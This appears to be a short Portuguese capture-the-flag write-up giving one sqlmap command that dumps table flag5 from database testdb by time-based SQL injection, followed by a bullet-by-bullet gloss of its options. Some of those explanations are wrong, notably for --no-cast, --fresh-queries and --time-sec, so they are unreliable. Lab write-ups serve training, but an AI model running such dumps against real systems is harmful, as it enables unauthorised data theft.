Question-1

Qual é o conteúdo da tabela flag5? (Caso #5)

Payload :

sqlmap -r req.txt --batch --dump -T flag5 -D testdb --no-cast --dbms=MySQL --technique=T --time-sec=10 --level=5 --risk=3 --fresh-queries
  • sqlmap: Ferramenta para detecção e exploração de vulnerabilidades de injeção SQL via linha de comando.

  • -r req.txt: Especifica o arquivo req.txt que contém os detalhes da requisição HTTP a ser analisada.

  • --batch: Modo de execução não-interativo do SQLMap, ideal para automação.

  • --dump: Opção para extrair dados do banco de dados.

  • -T flag5: Especifica a tabela flag5 como alvo para extração de dados.

  • -D testdb: Indica o banco de dados testdb onde a tabela flag5 está localizada.

  • --no-cast: Desativa a conversão de payloads para evitar detecção por sistemas de segurança como WAFs.

  • --dbms=MySQL: Define o sistema de gerenciamento de banco de dados como MySQL.

  • --technique=T: Especifica a técnica de injeção SQL a ser utilizada, neste caso, injeção baseada em tempo.

  • --time-sec=10: Define o tempo máximo em segundos para aguardar uma resposta durante a execução de técnicas baseadas em tempo.

  • --level=5: Define o nível de teste a ser realizado pelo SQLMap, sendo 5 o nível mais alto e mais abrangente.

  • --risk=3: Define o nível de risco dos testes realizados pelo SQLMap, sendo 3 um nível consideravelmente alto.

  • --fresh-queries: Força o SQLMap a usar novas consultas SQL para cada requisição, o que ajuda a evitar mecanismos de cache e detecção.

Last updated